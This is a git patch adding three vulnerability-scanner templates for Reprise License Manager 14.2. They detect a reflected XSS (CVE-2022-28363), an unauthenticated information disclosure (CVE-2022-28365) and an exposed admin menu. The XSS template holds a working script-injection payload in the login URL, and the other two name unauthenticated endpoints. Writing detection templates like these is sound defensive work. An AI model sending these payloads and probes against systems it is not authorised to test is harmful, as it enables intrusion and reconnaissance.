From 5eb47292e426cebd32df6b09ada5e732cd3cc704 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sun, 10 Apr 2022 12:41:31 +0530 Subject: [PATCH] Added Reprise License Manager Templates (#4097) Co-Authored-By: Akincibor <99909324+Akincibor@users.noreply.github.com> Co-authored-by: Akincibor <99909324+Akincibor@users.noreply.github.com> --- cves/2022/CVE-2022-28363.yaml | 37 +++++++++++++++++++++++++++ cves/2022/CVE-2022-28365.yaml | 32 +++++++++++++++++++++++ vulnerabilities/other/unauth-rlm.yaml | 23 +++++++++++++++++ 3 files changed, 92 insertions(+) create mode 100644 cves/2022/CVE-2022-28363.yaml create mode 100644 cves/2022/CVE-2022-28365.yaml create mode 100644 vulnerabilities/other/unauth-rlm.yaml diff --git a/cves/2022/CVE-2022-28363.yaml b/cves/2022/CVE-2022-28363.yaml new file mode 100644 index 0000000000..b76eda6134 --- /dev/null +++ b/cves/2022/CVE-2022-28363.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-28363 + +info: + name: Reprise License Manager 14.2 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: | + Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-rpvc-qgrm-r54f + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + tags: cve,cve2022,xss,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '' + - 'Login Failed' + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/cves/2022/CVE-2022-28365.yaml b/cves/2022/CVE-2022-28365.yaml new file mode 100644 index 0000000000..75f6ffefc7 --- /dev/null +++ b/cves/2022/CVE-2022-28365.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-28365 + +info: + name: Reprise License Manager 14.2 - Information Disclosure + author: Akincibor + severity: low + description: | + Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-4g2v-6x25-vr7p + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + tags: cve,cve2022,exposure,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/rlminfo" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Version" + - "Platform type" + condition: and \ No newline at end of file diff --git a/vulnerabilities/other/unauth-rlm.yaml b/vulnerabilities/other/unauth-rlm.yaml new file mode 100644 index 0000000000..057a35f077 --- /dev/null +++ b/vulnerabilities/other/unauth-rlm.yaml @@ -0,0 +1,23 @@ +id: unauth-rlm + +info: + name: Unauthenticated Reprise License Manager + author: Akincibor + severity: critical + tags: unauth,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/menu" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Administration Commands" \ No newline at end of file